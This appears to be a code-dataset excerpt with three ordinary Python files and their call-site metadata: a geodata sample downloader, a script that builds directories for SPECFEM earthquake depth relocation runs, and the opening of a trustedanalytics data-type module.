if dst_path.exists():
return dst_path
# Make sure the destination directory exists
dst_path.parent.mkdir(parents=True, exist_ok=True)
# If the url points to a file with the same suffix as the dst_path,
# just download
url_path = Path(url)
if url_path.suffix.lower() == dst_path.suffix.lower():
logger.info(f"Download to {dst_path}")
urllib.request.urlretrieve(url, dst_path)
else:
# The file downloaded is different that the destination wanted, so some
# converting will need to be done
tmp_dir = dst_path.parent / "tmp"
try:
# Remove tmp dir if it exists already
if tmp_dir.exists():
shutil.rmtree(tmp_dir)
tmp_dir.mkdir(parents=True, exist_ok=True)
# Download file
tmp_path = tmp_dir / f"{dst_path.stem}{url_path.suffix.lower()}"
logger.info(f"Download tmp data to {tmp_path}")
urllib.request.urlretrieve(url, tmp_path)
# If the temp file is a .zip file, unzip to dir
if tmp_path.suffix == ".zip":
# Unzip
unzippedzip_dir = dst_path.parent / tmp_path.stem
logger.info(f"Unzip to {unzippedzip_dir}")
with zipfile.ZipFile(tmp_path, "r") as zip_ref:
zip_ref.extractall(unzippedzip_dir)
# Look for the file
tmp_paths = []
for suffix in [".shp", ".gpkg"]:
tmp_paths.extend(list(unzippedzip_dir.rglob(f"*{suffix}")))
if len(tmp_paths) == 1:
tmp_path = tmp_paths[0]
else:
raise Exception(
f"Should find 1 geofile, found {len(tmp_paths)}: \n{pprint.pformat(tmp_paths)}"
)
if dst_path.suffix == tmp_path.suffix:
gfo.move(tmp_path, dst_path)
else:
logger.info(f"Convert tmp file to {dst_path}")
gfo.makevalid(tmp_path, dst_path)
finally:
if tmp_dir.exists():
shutil.rmtree(tmp_dir)
return dst_path
def prepare_dst_path(dst_name: str, dst_dir: Optional[Path] = None):
if dst_dir is None:
return Path(tempfile.gettempdir()) / "geofileops_sampledata" / dst_name
else:
return dst_dir / dst_name
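# --- Usage sketch (added for illustration; the target dir below is made up) ---
#
#     benchmark_dir = Path("/tmp/geofileops_benchmark")
#     # downloads the zipped shapefile, unzips it and converts it to .gpkg
#     agriprc_path = TestFile.AGRIPRC_2018.get_file(benchmark_dir)
#     communes_path = download_samplefile(
#         url=TestFile.COMMUNES.url, dst_name="communes.gpkg", dst_dir=benchmark_dir)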
| [((25, 9, 25, 36), 'logging.getLogger', 'logging.getLogger', ({(25, 27, 25, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((94, 15, 94, 24), 'pathlib.Path', 'Path', ({(94, 20, 94, 23): 'url'}, {}), '(url)', False, 'from pathlib import Path\n'), ((58, 24, 58, 56), 'geofileops.get_layerinfo', 'gfo.get_layerinfo', ({(58, 42, 58, 55): 'testfile_path'}, {}), '(testfile_path)', True, 'import geofileops as gfo\n'), ((106, 16, 106, 38), 'shutil.rmtree', 'shutil.rmtree', ({(106, 30, 106, 37): 'tmp_dir'}, {}), '(tmp_dir)', False, 'import shutil\n'), ((134, 16, 134, 44), 'geofileops.move', 'gfo.move', ({(134, 25, 134, 33): 'tmp_path', (134, 35, 134, 43): 'dst_path'}, {}), '(tmp_path, dst_path)', True, 'import geofileops as gfo\n'), ((137, 16, 137, 49), 'geofileops.makevalid', 'gfo.makevalid', ({(137, 30, 137, 38): 'tmp_path', (137, 40, 137, 48): 'dst_path'}, {}), '(tmp_path, dst_path)', True, 'import geofileops as gfo\n'), ((140, 16, 140, 38), 'shutil.rmtree', 'shutil.rmtree', ({(140, 30, 140, 37): 'tmp_dir'}, {}), '(tmp_dir)', False, 'import shutil\n'), ((119, 21, 119, 51), 'zipfile.ZipFile', 'zipfile.ZipFile', ({(119, 37, 119, 45): 'tmp_path', (119, 47, 119, 50): '"""r"""'}, {}), "(tmp_path, 'r')", False, 'import zipfile\n'), ((147, 20, 147, 41), 'tempfile.gettempdir', 'tempfile.gettempdir', ({}, {}), '()', False, 'import tempfile\n'), ((18, 23, 18, 37), 'pathlib.Path', 'Path', ({(18, 28, 18, 36): '__file__'}, {}), '(__file__)', False, 'from pathlib import Path\n'), ((130, 76, 130, 101), 'pprint.pformat', 'pprint.pformat', ({(130, 91, 130, 100): 'tmp_paths'}, {}), '(tmp_paths)', False, 'import pprint\n')] |
ziyixi/SeisScripts | relocation/depth/setup_relocation_dir.py | a484bc1747eae52b2441f0bfd47ac7e093150f1d | """
setup earthquake depth relocation directory
"""
import obspy
import sh
import numpy as np
import click
from os.path import join
from glob import glob
import copy
def generate_new_cmtsolution_files(cmts_dir, generated_cmts_dir, depth_perturbation_list):
cmt_names = glob(join(cmts_dir, "*"))
for cmt_file in cmt_names:
event = obspy.read_events(cmt_file)[0]
# gcmt_id = event.resource_id.id.split("/")[-2]
# there are some problems in changing names
gcmt_id = cmt_file.split("/")[-1]
# assume dirs like f"{generated_cmts_dir}/d-3" have already been created
for depth_per in depth_perturbation_list:
generated_name = join(generated_cmts_dir, f"d{depth_per}", gcmt_id)
            # there are always problems when copying the event, so read it in again here
event_this_depth = obspy.read_events(cmt_file)[0]
# event_this_depth = event.copy()
event_this_depth.origins[0].depth += 1000.0*depth_per
# print(generated_name, generated_cmts_dir, f"d{depth_per}", gcmt_id)
event_this_depth.write(generated_name, format="CMTSOLUTION")
def setup_basic_structure(main_dir, ref_dir, cmts_dir, depth_perturbation_list):
# main
sh.mkdir("-p", main_dir)
# ref
sh.cp("-r", ref_dir, join(main_dir, "ref"))
# refine the structure in ref
sh.rm("-rf", join(main_dir, "ref", "DATABASES_MPI"))
sh.rm("-rf", join(main_dir, "ref", "EXAMPLES"))
sh.rm("-rf", join(main_dir, "ref", "OUTPUT_FILES"))
sh.rm("-rf", join(main_dir, "ref", "doc"))
sh.rm("-rf", join(main_dir, "ref", "tests"))
# mv DATA and utils to upper level
sh.mv(join(main_dir, "ref", "DATA"), main_dir)
sh.mv(join(main_dir, "ref", "utils"), main_dir)
# cmts
sh.mkdir("-p", join(main_dir, "cmts"))
sh.cp("-r", cmts_dir, join(main_dir, "cmts", "cmts_raw"))
sh.mkdir("-p", join(main_dir, "cmts", "cmts_generated"))
for depth_per in depth_perturbation_list:
sh.mkdir("-p", join(main_dir, "cmts",
"cmts_generated", f"d{depth_per}"))
# working directory
sh.mkdir("-p", join(main_dir, "work"))
def setup_structure_after_generat_cmts(main_dir, output_dir, depth_perturbation_list):
# get cmts names
cmt_dirs = glob(join(main_dir, "cmts", "cmts_raw", "*"))
cmt_names = [item.split("/")[-1] for item in cmt_dirs]
# mkdirs
for cmt_name in cmt_names:
sh.mkdir(join(main_dir, "work", cmt_name))
for depth_per in depth_perturbation_list:
# sh.mkdir(join(main_dir, "work", cmt_name, f"d{depth_per}"))
# cp ref to working dirs
sh.cp("-r", join(main_dir, "ref"),
join(main_dir, "work", cmt_name, f"d{depth_per}"))
# mv DATA and utils back to ref
sh.mv(join(main_dir, "DATA"), join(main_dir, "ref", "DATA"))
sh.mv(join(main_dir, "utils"), join(main_dir, "ref", "utils"))
# mkdir DATA in work directory
for cmt_name in cmt_names:
for depth_per in depth_perturbation_list:
sh.mkdir(join(main_dir, "work", cmt_name, f"d{depth_per}", "DATA"))
# cp and ln files in DATA
toln = ["cemRequest", "crust1.0", "crust2.0",
"crustmap", "epcrust", "eucrust-07", "GLL", "heterogen", "Lebedev_sea99", "Montagner_model", "old", "PPM", "QRFSI12", "s20rts", "s362ani", "s40rts", "Simons_model", "topo_bathy", "Zhao_JP_model"]
for cmt_name in cmt_names:
for depth_per in depth_perturbation_list:
sh.cp(join(main_dir, "cmts", "cmts_generated",
f"d{depth_per}", cmt_name), join(main_dir, "work", cmt_name, f"d{depth_per}", "DATA", "CMTSOLUTION"))
sh.cp(join(main_dir, "ref", "DATA", "Par_file"), join(
main_dir, "work", cmt_name, f"d{depth_per}", "DATA", "Par_file"))
sh.cp(join(main_dir, "ref", "DATA", "STATIONS"), join(
main_dir, "work", cmt_name, f"d{depth_per}", "DATA", "STATIONS"))
for lnfile in toln:
sh.ln("-s", join(main_dir, "ref", "DATA", lnfile), join(
main_dir, "work", cmt_name, f"d{depth_per}", "DATA", lnfile))
# ln in work files
toln_work = ["utils"]
for lnfile in toln_work:
sh.ln("-s", join(main_dir, "ref", lnfile), join(
main_dir, "work", cmt_name, f"d{depth_per}", lnfile))
# mkdir and ln DATABASE_MPI and OUTPUT_FILES
sh.mkdir("-p", output_dir)
sh.mkdir("-p", join(output_dir, "DATABASES_MPI"))
sh.mkdir("-p", join(output_dir, "OUTPUT_FILES"))
for cmt_name in cmt_names:
for depth_per in depth_perturbation_list:
sh.mkdir("-p", join(output_dir, "DATABASES_MPI",
cmt_name, f"d{depth_per}"))
sh.mkdir("-p", join(output_dir, "OUTPUT_FILES",
cmt_name, f"d{depth_per}"))
sh.ln("-s", join(output_dir, "DATABASES_MPI",
cmt_name, f"d{depth_per}"), join(main_dir, "work", cmt_name, f"d{depth_per}", "DATABASES_MPI"))
sh.ln("-s", join(output_dir, "OUTPUT_FILES",
cmt_name, f"d{depth_per}"), join(main_dir, "work", cmt_name, f"d{depth_per}", "OUTPUT_FILES"))
@click.command()
@click.option('--main_dir', required=True, help="the main working directory", type=str)
@click.option('--output_dir', required=True, help="the output directory in scratch", type=str)
@click.option('--ref_dir', required=True, help="the reference specfem directory", type=str)
@click.option('--cmts_dir', required=True, help="the cmt solution directory", type=str)
@click.option('--depth_perturbation', required=True, help="the depth perturbation, use somthing like -3,-1,5 (in km)", type=str)
def main(main_dir, output_dir, ref_dir, cmts_dir, depth_perturbation):
depth_perturbation_list = [float(item)
for item in depth_perturbation.split(",")]
setup_basic_structure(main_dir, ref_dir, cmts_dir, depth_perturbation_list)
generated_cmts_dir = join(main_dir, "cmts", "cmts_generated")
working_cmts_dir = join(main_dir, "cmts", "cmts_raw")
generate_new_cmtsolution_files(
working_cmts_dir, generated_cmts_dir, depth_perturbation_list)
setup_structure_after_generat_cmts(
main_dir, output_dir, depth_perturbation_list)
if __name__ == "__main__":
main()
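# --- Example invocation (added for illustration; every path is a placeholder) ---
#
#     python setup_relocation_dir.py \
#         --main_dir /scratch/user/relocation \
#         --output_dir /scratch/user/relocation_output \
#         --ref_dir /path/to/specfem3d_globe \
#         --cmts_dir /path/to/cmt_solutions \
#         --depth_perturbation=-3,-1,1,3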
| [((123, 1, 123, 16), 'click.command', 'click.command', ({}, {}), '()', False, 'import click\n'), ((124, 1, 124, 87), 'click.option', 'click.option', (), '', False, 'import click\n'), ((125, 1, 125, 94), 'click.option', 'click.option', (), '', False, 'import click\n'), ((126, 1, 126, 91), 'click.option', 'click.option', (), '', False, 'import click\n'), ((127, 1, 127, 87), 'click.option', 'click.option', (), '', False, 'import click\n'), ((128, 1, 128, 128), 'click.option', 'click.option', (), '', False, 'import click\n'), ((35, 4, 35, 28), 'sh.mkdir', 'sh.mkdir', ({(35, 13, 35, 17): '"""-p"""', (35, 19, 35, 27): 'main_dir'}, {}), "('-p', main_dir)", False, 'import sh\n'), ((108, 4, 108, 30), 'sh.mkdir', 'sh.mkdir', ({(108, 13, 108, 17): '"""-p"""', (108, 19, 108, 29): 'output_dir'}, {}), "('-p', output_dir)", False, 'import sh\n'), ((133, 25, 133, 65), 'os.path.join', 'join', ({(133, 30, 133, 38): 'main_dir', (133, 40, 133, 46): '"""cmts"""', (133, 48, 133, 64): '"""cmts_generated"""'}, {}), "(main_dir, 'cmts', 'cmts_generated')", False, 'from os.path import join\n'), ((134, 23, 134, 57), 'os.path.join', 'join', ({(134, 28, 134, 36): 'main_dir', (134, 38, 134, 44): '"""cmts"""', (134, 46, 134, 56): '"""cmts_raw"""'}, {}), "(main_dir, 'cmts', 'cmts_raw')", False, 'from os.path import join\n'), ((15, 21, 15, 40), 'os.path.join', 'join', ({(15, 26, 15, 34): 'cmts_dir', (15, 36, 15, 39): '"""*"""'}, {}), "(cmts_dir, '*')", False, 'from os.path import join\n'), ((38, 25, 38, 46), 'os.path.join', 'join', ({(38, 30, 38, 38): 'main_dir', (38, 40, 38, 45): '"""ref"""'}, {}), "(main_dir, 'ref')", False, 'from os.path import join\n'), ((41, 17, 41, 55), 'os.path.join', 'join', ({(41, 22, 41, 30): 'main_dir', (41, 32, 41, 37): '"""ref"""', (41, 39, 41, 54): '"""DATABASES_MPI"""'}, {}), "(main_dir, 'ref', 'DATABASES_MPI')", False, 'from os.path import join\n'), ((42, 17, 42, 50), 'os.path.join', 'join', ({(42, 22, 42, 30): 'main_dir', (42, 32, 42, 37): '"""ref"""', (42, 39, 42, 49): '"""EXAMPLES"""'}, {}), "(main_dir, 'ref', 'EXAMPLES')", False, 'from os.path import join\n'), ((43, 17, 43, 54), 'os.path.join', 'join', ({(43, 22, 43, 30): 'main_dir', (43, 32, 43, 37): '"""ref"""', (43, 39, 43, 53): '"""OUTPUT_FILES"""'}, {}), "(main_dir, 'ref', 'OUTPUT_FILES')", False, 'from os.path import join\n'), ((44, 17, 44, 45), 'os.path.join', 'join', ({(44, 22, 44, 30): 'main_dir', (44, 32, 44, 37): '"""ref"""', (44, 39, 44, 44): '"""doc"""'}, {}), "(main_dir, 'ref', 'doc')", False, 'from os.path import join\n'), ((45, 17, 45, 47), 'os.path.join', 'join', ({(45, 22, 45, 30): 'main_dir', (45, 32, 45, 37): '"""ref"""', (45, 39, 45, 46): '"""tests"""'}, {}), "(main_dir, 'ref', 'tests')", False, 'from os.path import join\n'), ((48, 10, 48, 39), 'os.path.join', 'join', ({(48, 15, 48, 23): 'main_dir', (48, 25, 48, 30): '"""ref"""', (48, 32, 48, 38): '"""DATA"""'}, {}), "(main_dir, 'ref', 'DATA')", False, 'from os.path import join\n'), ((49, 10, 49, 40), 'os.path.join', 'join', ({(49, 15, 49, 23): 'main_dir', (49, 25, 49, 30): '"""ref"""', (49, 32, 49, 39): '"""utils"""'}, {}), "(main_dir, 'ref', 'utils')", False, 'from os.path import join\n'), ((52, 19, 52, 41), 'os.path.join', 'join', ({(52, 24, 52, 32): 'main_dir', (52, 34, 52, 40): '"""cmts"""'}, {}), "(main_dir, 'cmts')", False, 'from os.path import join\n'), ((53, 26, 53, 60), 'os.path.join', 'join', ({(53, 31, 53, 39): 'main_dir', (53, 41, 53, 47): '"""cmts"""', (53, 49, 53, 59): '"""cmts_raw"""'}, {}), "(main_dir, 'cmts', 'cmts_raw')", False, 'from os.path 
import join\n'), ((54, 19, 54, 59), 'os.path.join', 'join', ({(54, 24, 54, 32): 'main_dir', (54, 34, 54, 40): '"""cmts"""', (54, 42, 54, 58): '"""cmts_generated"""'}, {}), "(main_dir, 'cmts', 'cmts_generated')", False, 'from os.path import join\n'), ((60, 19, 60, 41), 'os.path.join', 'join', ({(60, 24, 60, 32): 'main_dir', (60, 34, 60, 40): '"""work"""'}, {}), "(main_dir, 'work')", False, 'from os.path import join\n'), ((65, 20, 65, 59), 'os.path.join', 'join', ({(65, 25, 65, 33): 'main_dir', (65, 35, 65, 41): '"""cmts"""', (65, 43, 65, 53): '"""cmts_raw"""', (65, 55, 65, 58): '"""*"""'}, {}), "(main_dir, 'cmts', 'cmts_raw', '*')", False, 'from os.path import join\n'), ((78, 10, 78, 32), 'os.path.join', 'join', ({(78, 15, 78, 23): 'main_dir', (78, 25, 78, 31): '"""DATA"""'}, {}), "(main_dir, 'DATA')", False, 'from os.path import join\n'), ((78, 34, 78, 63), 'os.path.join', 'join', ({(78, 39, 78, 47): 'main_dir', (78, 49, 78, 54): '"""ref"""', (78, 56, 78, 62): '"""DATA"""'}, {}), "(main_dir, 'ref', 'DATA')", False, 'from os.path import join\n'), ((79, 10, 79, 33), 'os.path.join', 'join', ({(79, 15, 79, 23): 'main_dir', (79, 25, 79, 32): '"""utils"""'}, {}), "(main_dir, 'utils')", False, 'from os.path import join\n'), ((79, 35, 79, 65), 'os.path.join', 'join', ({(79, 40, 79, 48): 'main_dir', (79, 50, 79, 55): '"""ref"""', (79, 57, 79, 64): '"""utils"""'}, {}), "(main_dir, 'ref', 'utils')", False, 'from os.path import join\n'), ((109, 19, 109, 52), 'os.path.join', 'join', ({(109, 24, 109, 34): 'output_dir', (109, 36, 109, 51): '"""DATABASES_MPI"""'}, {}), "(output_dir, 'DATABASES_MPI')", False, 'from os.path import join\n'), ((110, 19, 110, 51), 'os.path.join', 'join', ({(110, 24, 110, 34): 'output_dir', (110, 36, 110, 50): '"""OUTPUT_FILES"""'}, {}), "(output_dir, 'OUTPUT_FILES')", False, 'from os.path import join\n'), ((17, 16, 17, 43), 'obspy.read_events', 'obspy.read_events', ({(17, 34, 17, 42): 'cmt_file'}, {}), '(cmt_file)', False, 'import obspy\n'), ((24, 29, 24, 79), 'os.path.join', 'join', ({(24, 34, 24, 52): 'generated_cmts_dir', (24, 54, 24, 69): 'f"""d{depth_per}"""', (24, 71, 24, 78): 'gcmt_id'}, {}), "(generated_cmts_dir, f'd{depth_per}', gcmt_id)", False, 'from os.path import join\n'), ((56, 23, 57, 62), 'os.path.join', 'join', ({(56, 28, 56, 36): 'main_dir', (56, 38, 56, 44): '"""cmts"""', (57, 28, 57, 44): '"""cmts_generated"""', (57, 46, 57, 61): 'f"""d{depth_per}"""'}, {}), "(main_dir, 'cmts', 'cmts_generated', f'd{depth_per}')", False, 'from os.path import join\n'), ((70, 17, 70, 49), 'os.path.join', 'join', ({(70, 22, 70, 30): 'main_dir', (70, 32, 70, 38): '"""work"""', (70, 40, 70, 48): 'cmt_name'}, {}), "(main_dir, 'work', cmt_name)", False, 'from os.path import join\n'), ((26, 31, 26, 58), 'obspy.read_events', 'obspy.read_events', ({(26, 49, 26, 57): 'cmt_file'}, {}), '(cmt_file)', False, 'import obspy\n'), ((74, 24, 74, 45), 'os.path.join', 'join', ({(74, 29, 74, 37): 'main_dir', (74, 39, 74, 44): '"""ref"""'}, {}), "(main_dir, 'ref')", False, 'from os.path import join\n'), ((75, 18, 75, 67), 'os.path.join', 'join', ({(75, 23, 75, 31): 'main_dir', (75, 33, 75, 39): '"""work"""', (75, 41, 75, 49): 'cmt_name', (75, 51, 75, 66): 'f"""d{depth_per}"""'}, {}), "(main_dir, 'work', cmt_name, f'd{depth_per}')", False, 'from os.path import join\n'), ((84, 21, 84, 78), 'os.path.join', 'join', ({(84, 26, 84, 34): 'main_dir', (84, 36, 84, 42): '"""work"""', (84, 44, 84, 52): 'cmt_name', (84, 54, 84, 69): 'f"""d{depth_per}"""', (84, 71, 84, 77): '"""DATA"""'}, {}), "(main_dir, 
'work', cmt_name, f'd{depth_per}', 'DATA')", False, 'from os.path import join\n'), ((91, 18, 92, 49), 'os.path.join', 'join', ({(91, 23, 91, 31): 'main_dir', (91, 33, 91, 39): '"""cmts"""', (91, 41, 91, 57): '"""cmts_generated"""', (92, 23, 92, 38): 'f"""d{depth_per}"""', (92, 40, 92, 48): 'cmt_name'}, {}), "(main_dir, 'cmts', 'cmts_generated', f'd{depth_per}', cmt_name)", False, 'from os.path import join\n'), ((92, 51, 92, 123), 'os.path.join', 'join', ({(92, 56, 92, 64): 'main_dir', (92, 66, 92, 72): '"""work"""', (92, 74, 92, 82): 'cmt_name', (92, 84, 92, 99): 'f"""d{depth_per}"""', (92, 101, 92, 107): '"""DATA"""', (92, 109, 92, 122): '"""CMTSOLUTION"""'}, {}), "(main_dir, 'work', cmt_name, f'd{depth_per}', 'DATA', 'CMTSOLUTION')", False, 'from os.path import join\n'), ((93, 18, 93, 59), 'os.path.join', 'join', ({(93, 23, 93, 31): 'main_dir', (93, 33, 93, 38): '"""ref"""', (93, 40, 93, 46): '"""DATA"""', (93, 48, 93, 58): '"""Par_file"""'}, {}), "(main_dir, 'ref', 'DATA', 'Par_file')", False, 'from os.path import join\n'), ((93, 61, 94, 80), 'os.path.join', 'join', ({(94, 16, 94, 24): 'main_dir', (94, 26, 94, 32): '"""work"""', (94, 34, 94, 42): 'cmt_name', (94, 44, 94, 59): 'f"""d{depth_per}"""', (94, 61, 94, 67): '"""DATA"""', (94, 69, 94, 79): '"""Par_file"""'}, {}), "(main_dir, 'work', cmt_name, f'd{depth_per}', 'DATA', 'Par_file')", False, 'from os.path import join\n'), ((95, 18, 95, 59), 'os.path.join', 'join', ({(95, 23, 95, 31): 'main_dir', (95, 33, 95, 38): '"""ref"""', (95, 40, 95, 46): '"""DATA"""', (95, 48, 95, 58): '"""STATIONS"""'}, {}), "(main_dir, 'ref', 'DATA', 'STATIONS')", False, 'from os.path import join\n'), ((95, 61, 96, 80), 'os.path.join', 'join', ({(96, 16, 96, 24): 'main_dir', (96, 26, 96, 32): '"""work"""', (96, 34, 96, 42): 'cmt_name', (96, 44, 96, 59): 'f"""d{depth_per}"""', (96, 61, 96, 67): '"""DATA"""', (96, 69, 96, 79): '"""STATIONS"""'}, {}), "(main_dir, 'work', cmt_name, f'd{depth_per}', 'DATA', 'STATIONS')", False, 'from os.path import join\n'), ((113, 27, 114, 58), 'os.path.join', 'join', ({(113, 32, 113, 42): 'output_dir', (113, 44, 113, 59): '"""DATABASES_MPI"""', (114, 32, 114, 40): 'cmt_name', (114, 42, 114, 57): 'f"""d{depth_per}"""'}, {}), "(output_dir, 'DATABASES_MPI', cmt_name, f'd{depth_per}')", False, 'from os.path import join\n'), ((115, 27, 116, 58), 'os.path.join', 'join', ({(115, 32, 115, 42): 'output_dir', (115, 44, 115, 58): '"""OUTPUT_FILES"""', (116, 32, 116, 40): 'cmt_name', (116, 42, 116, 57): 'f"""d{depth_per}"""'}, {}), "(output_dir, 'OUTPUT_FILES', cmt_name, f'd{depth_per}')", False, 'from os.path import join\n'), ((117, 24, 118, 55), 'os.path.join', 'join', ({(117, 29, 117, 39): 'output_dir', (117, 41, 117, 56): '"""DATABASES_MPI"""', (118, 29, 118, 37): 'cmt_name', (118, 39, 118, 54): 'f"""d{depth_per}"""'}, {}), "(output_dir, 'DATABASES_MPI', cmt_name, f'd{depth_per}')", False, 'from os.path import join\n'), ((118, 57, 118, 123), 'os.path.join', 'join', ({(118, 62, 118, 70): 'main_dir', (118, 72, 118, 78): '"""work"""', (118, 80, 118, 88): 'cmt_name', (118, 90, 118, 105): 'f"""d{depth_per}"""', (118, 107, 118, 122): '"""DATABASES_MPI"""'}, {}), "(main_dir, 'work', cmt_name, f'd{depth_per}', 'DATABASES_MPI')", False, 'from os.path import join\n'), ((119, 24, 120, 55), 'os.path.join', 'join', ({(119, 29, 119, 39): 'output_dir', (119, 41, 119, 55): '"""OUTPUT_FILES"""', (120, 29, 120, 37): 'cmt_name', (120, 39, 120, 54): 'f"""d{depth_per}"""'}, {}), "(output_dir, 'OUTPUT_FILES', cmt_name, f'd{depth_per}')", False, 'from 
os.path import join\n'), ((120, 57, 120, 122), 'os.path.join', 'join', ({(120, 62, 120, 70): 'main_dir', (120, 72, 120, 78): '"""work"""', (120, 80, 120, 88): 'cmt_name', (120, 90, 120, 105): 'f"""d{depth_per}"""', (120, 107, 120, 121): '"""OUTPUT_FILES"""'}, {}), "(main_dir, 'work', cmt_name, f'd{depth_per}', 'OUTPUT_FILES')", False, 'from os.path import join\n'), ((98, 28, 98, 65), 'os.path.join', 'join', ({(98, 33, 98, 41): 'main_dir', (98, 43, 98, 48): '"""ref"""', (98, 50, 98, 56): '"""DATA"""', (98, 58, 98, 64): 'lnfile'}, {}), "(main_dir, 'ref', 'DATA', lnfile)", False, 'from os.path import join\n'), ((98, 67, 99, 80), 'os.path.join', 'join', ({(99, 20, 99, 28): 'main_dir', (99, 30, 99, 36): '"""work"""', (99, 38, 99, 46): 'cmt_name', (99, 48, 99, 63): 'f"""d{depth_per}"""', (99, 65, 99, 71): '"""DATA"""', (99, 73, 99, 79): 'lnfile'}, {}), "(main_dir, 'work', cmt_name, f'd{depth_per}', 'DATA', lnfile)", False, 'from os.path import join\n'), ((104, 28, 104, 57), 'os.path.join', 'join', ({(104, 33, 104, 41): 'main_dir', (104, 43, 104, 48): '"""ref"""', (104, 50, 104, 56): 'lnfile'}, {}), "(main_dir, 'ref', lnfile)", False, 'from os.path import join\n'), ((104, 59, 105, 72), 'os.path.join', 'join', ({(105, 20, 105, 28): 'main_dir', (105, 30, 105, 36): '"""work"""', (105, 38, 105, 46): 'cmt_name', (105, 48, 105, 63): 'f"""d{depth_per}"""', (105, 65, 105, 71): 'lnfile'}, {}), "(main_dir, 'work', cmt_name, f'd{depth_per}', lnfile)", False, 'from os.path import join\n')] |
blbarker/atk | python-client/trustedanalytics/core/atktypes.py | bcb747d053e801820233a6439c88a457c8cf2438 | # vim: set encoding=utf-8
#
# Copyright (c) 2015 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
trusted_analytics definitions for Data Types
"""
# TODO - consider server providing types, similar to commands
__all__ = ['valid_data_types', 'ignore', 'unknown', 'float32', 'float64', 'int32', 'int64', 'vector', 'unit', 'datetime']
import numpy as np
import json
import re
# alias numpy types
float32 = np.float32
float64 = np.float64
int32 = np.int32
int64 = np.int64
from datetime import datetime
import dateutil.parser as datetime_parser
# Chose python's datetime over numpy.datetime64 because of time zone support and string serialization
# Here's a long thread discussing numpy's datetime64 timezone problem:
# http://mail.scipy.org/pipermail/numpy-discussion/2013-April/066038.html
# If need be, UDFs can create numpy objects from x using: numpy.datetime64(x.isoformat())
class _Vector(object):
base_type = np.ndarray
re_pattern = re.compile(r"^vector\((\d+)\)$")
def __init__(self, length):
self.length = int(length)
self.is_complex_type = True
self.constructor = self._get_constructor()
def _get_constructor(self):
length = self.length
def constructor(value):
"""
Creates a numpy array from a value, which can be one of many types
"""
if value is None:
return None
try:
# first try numpy's constructor
array = np.array(value, dtype=np.float64) # ensures the array is entirely made of doubles
except:
# also support json or comma-sep string
if valid_data_types.value_is_string(value):
try:
value = json.loads(value)
except:
value = [np.float64(item.strip()) for item in value.split(',') if item]
array = np.array(value, dtype=np.float64) # ensures the array is entirely made of doubles
else:
raise
array = np.atleast_1d(array) # numpy thing, so that vectors of size 1 will still have dimension and length
if len(array) != length:
raise ValueError("Could not construct vector in Python Client. Expected vector of length %s, but received length %d" % (length, len(array)))
return array
return constructor
@staticmethod
def get_from_string(data_type_str):
return _Vector(_Vector.re_pattern.match(data_type_str).group(1))
def __repr__(self):
return "vector(%d)" % self.length
vector = _Vector
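# Illustrative sketch (not in the original source): per the constructor above, a
# vector(3) column type accepts a Python sequence, a JSON array string, or a
# comma-separated string, and normalizes each to a float64 numpy array, e.g.:
#
#     to_vec3 = vector(3).constructor
#     to_vec3([1, 2, 3])          # -> array([1., 2., 3.])
#     to_vec3("[1.0, 2.0, 3.0]")  # JSON string form
#     to_vec3("1.0, 2.0, 3.0")    # comma-separated string form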
class _Unit(object):
"""Ignore type used for schemas during file import"""
pass
unit = _Unit
class _Ignore(object):
"""Ignore type used for schemas during file import"""
pass
ignore = _Ignore
class _Unknown(object):
"""Unknown type used when type is indeterminate"""
pass
unknown = _Unknown
# map types to their string identifier
_primitive_type_to_str_table = {
#bool: "bool", TODO
#bytearray: "bytearray", TODO
#dict: "dict", TODO
float32: "float32",
float64: "float64",
int32: "int32",
int64: "int64",
#list: "list", TODO
unicode: "unicode",
ignore: "ignore",
datetime: "datetime",
}
# build reverse map string -> type
_primitive_str_to_type_table = dict([(s, t) for t, s in _primitive_type_to_str_table.iteritems()])
_primitive_alias_type_to_type_table = {
float: float64,
int: int32,
long: int64,
str: unicode,
#list: vector,
}
_primitive_alias_str_to_type_table = dict([(alias.__name__, t) for alias, t in _primitive_alias_type_to_type_table.iteritems()])
_primitive_type_to_default_value = {
#bool: False, TODO
float32: 0.0,
float64: 0.0,
int32: 0,
int64: 0,
unicode: "",
#datetime: "datetime",
}
def get_float_constructor(float_type):
"""Creates special constructor for floating point types which handles nan, inf, -inf"""
ft = float_type
def float_constructor(value):
result = ft(value)
if np.isnan(result) or result == np.inf or result == -np.inf: # this is 5x faster than calling np.isfinite()
return None
return ft(value)
return float_constructor
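# Illustrative sketch (values assumed): the float constructors map non-finite
# values to None, which is treated as a missing value, e.g.
#     get_float_constructor(float64)("3.5")   # -> 3.5
#     get_float_constructor(float64)("inf")   # -> None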
def datetime_constructor(value):
"""Creates special constructor for datetime parsing"""
if valid_data_types.value_is_string(value):
return datetime_parser.parse(value)
else:
try:
return datetime(*value)
except:
raise TypeError("cannot convert type to the datetime")
class _DataTypes(object):
"""
    Provides functions which define and operate on supported data types.
"""
def __contains__(self, item):
try:
self.validate(item)
return True
except ValueError:
return False
def __repr__(self):
aliases = "\n(and aliases: %s)" % (", ".join(sorted(["%s->%s" % (alias.__name__, self.to_string(data_type)) for alias, data_type in _primitive_alias_type_to_type_table.iteritems()])))
return ", ".join(sorted(_primitive_str_to_type_table.keys() + ["vector(n)"])) + aliases
@staticmethod
def value_is_string(value):
"""get bool indication that value is a string, whether str or unicode"""
return isinstance(value, basestring)
@staticmethod
def value_is_missing_value(value):
return value is None or (type(value) in [float32, float64, float] and (np.isnan(value) or value in [np.inf, -np.inf]))
@staticmethod
def get_primitive_data_types():
return _primitive_type_to_str_table.keys()
@staticmethod
def to_string(data_type):
"""
Returns the string representation of the given type
Parameters
----------
data_type : type
valid data type; if invalid, a ValueError is raised
Returns
-------
result : str
string representation
Examples
--------
>>> valid_data_types.to_string(float32)
'float32'
"""
valid_data_type = _DataTypes.get_from_type(data_type)
try:
return _primitive_type_to_str_table[valid_data_type]
except KeyError:
# complex data types should use their repr
return repr(valid_data_type)
@staticmethod
def get_from_string(data_type_str):
"""
Returns the data type for the given type string representation
Parameters
----------
data_type_str : str
valid data type str; if invalid, a ValueError is raised
Returns
-------
result : type
type represented by the string
Examples
--------
>>> valid_data_types.get_from_string('unicode')
unicode
"""
try:
